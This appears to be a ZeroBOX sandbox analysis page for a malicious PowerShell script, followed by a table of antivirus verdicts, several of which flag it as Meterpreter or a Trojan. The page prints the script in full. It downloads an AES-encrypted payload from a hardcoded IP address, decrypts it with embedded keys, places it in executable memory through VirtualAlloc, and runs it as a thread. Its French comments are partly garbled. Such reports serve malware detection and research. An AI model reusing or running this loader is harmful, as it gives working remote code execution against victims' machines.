Static | ZeroBOX
No static analysis available.
# --- Configuration ---
AES (256-bit
32 octets)
$key = [Convert]::FromBase64String("yoNNnjSoJu0pkSUtF5kizsAZE6QsVVkBGACF1fyva9Y=")
# IV (Initialization Vector) - 16 octets
$iv = [Convert]::FromBase64String("a4NP94kEFOA/mF25N8Yu4Q==")
# URL du payload chiffr
$url = "http://212.227.245.12/payload2.bin"
charger en m
$webclient = New-Object System.Net.WebClient
$encrypted = $webclient.DownloadData($url)
chiffrement AES
$aes = [System.Security.Cryptography.AesManaged]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::None
$aes.Key = $key
$aes.IV = $iv
$decryptor = $aes.CreateDecryptor()
$plaintext = $decryptor.TransformFinalBlock($encrypted, 0, $encrypted.Length)
# Allocation m
moire ex
cutable
$VirtualAlloc = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
"@ -Name "Win32" -Namespace "PInvoke" -PassThru
$exec = $VirtualAlloc::VirtualAlloc(0, $plaintext.Length, 0x1000 -bor 0x2000, 0x40)
# Injection du shellcode
[System.Runtime.InteropServices.Marshal]::Copy($plaintext, 0, $exec, $plaintext.Length)
cution dans un thread
$CreateThread = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, out UInt32 lpThreadId);
"@ -Name "Threading" -Namespace "PInvoke" -PassThru
$null = $CreateThread::CreateThread(0, 0, $exec, 0, 0, [ref]0)
# Boucle passive pour garder le shellcode actif
while ($true) { Start-Sleep -Seconds 10 }
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.unknown.boxter
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Backdoor/Meterpreter.as
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.826.3EE00B4F
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.826.3EE00B4F
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.826.3EE00B4F
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Boxter.826.3EE00B4F (B)
Ikarus Clean
GData Heur.BZC.PZQ.Boxter.826.3EE00B4F
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.826.3EE00B4F
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Wacatac.C!ml
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.